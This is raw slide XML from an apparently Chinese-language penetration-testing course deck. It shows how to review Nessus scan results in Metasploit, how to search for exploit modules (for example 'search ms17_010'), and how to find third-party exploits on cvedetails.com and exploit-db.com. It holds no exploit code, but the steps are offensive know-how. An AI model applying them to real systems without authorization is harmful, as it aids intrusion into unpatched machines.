            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    /home/bhl123/Downloads/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>nessus.license</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="5A5A5A"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial"/>
              <a:ea typeface="微软雅黑"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" marR="0" lvl="0" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="5A5A5A"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial"/>
              <a:ea typeface="微软雅黑"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" marR="0" lvl="0" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="5A5A5A"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial"/>
              <a:ea typeface="微软雅黑"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2134E755-2853-C109-5421-570EDDA886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5078" y="5180317"/>
            <a:ext cx="3427108" cy="1509386"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="箭头: 左 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1B4A5BD-69F1-592D-67BA-F4D85F9FF56A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18522343">
            <a:off x="10466112" y="4876266"/>
            <a:ext cx="576609" cy="215611"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">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爆炸形: 8 pt  6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F845D5EC-078C-1845-E186-902FB3191529}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10130533" y="3948405"/>
            <a:ext cx="2061467" cy="1163262"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">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提示</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E69EB895-120B-1785-3D1D-F057B55ED674}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="84222" y="22188"/>
            <a:ext cx="3115710" cy="817056"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5212226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59E13E8-F1DD-82F9-81FC-DF8F61A83547}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2907494" y="851140"/>
            <a:ext cx="8979706" cy="6006860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9148CBF4-7169-508D-DFE7-FCE8C9B7CA6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="192065" y="1552265"/>
            <a:ext cx="2715429" cy="3908762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>预分析扫描</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="华文新楷"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>报告</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="华文新楷"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="华文新楷"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>查看主机信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="华文新楷"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="华文新楷"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>查看漏洞信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="华文新楷"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>vulns</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="华文新楷"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19114205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960990"/>
            <a:ext cx="10972800" cy="1252537"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>  查询</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>渗透测试模块</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="656925" y="2213527"/>
            <a:ext cx="10890305" cy="3451225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>漏洞利用主要是通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的渗透测试模块来实现的。所以，用户需要根据漏洞查找对应的渗透测试模块。在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>中，可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>命令快速查找渗透测试模块。用户还可以到一些第三方网站查找渗透测试模块，并导入到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>实施漏洞利用。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>例如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>search ms17_010</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>use </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>            back</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1856350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17443" y="1167419"/>
            <a:ext cx="10972800" cy="1118582"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>第三</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>方查找</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="748734" y="2239110"/>
            <a:ext cx="10641509" cy="3451225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>如果用户在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>中，找不到有效的渗透测试模块时，还可以从一些第三方网站查找，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>漏洞站点、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>exploitDB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>等。另外，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>还支持导入一些第三方模块，并实施渗透测试。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="924572" y="4200964"/>
            <a:ext cx="3681649" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>https://www.cvedetails.com/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="924572" y="5274836"/>
            <a:ext cx="3716915" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>exploitDB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>https://www.exploit-db.com/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7"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0144" y="3689920"/>
            <a:ext cx="6236003" cy="3024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11259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25287" y="912610"/>
            <a:ext cx="10972800" cy="1252537"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
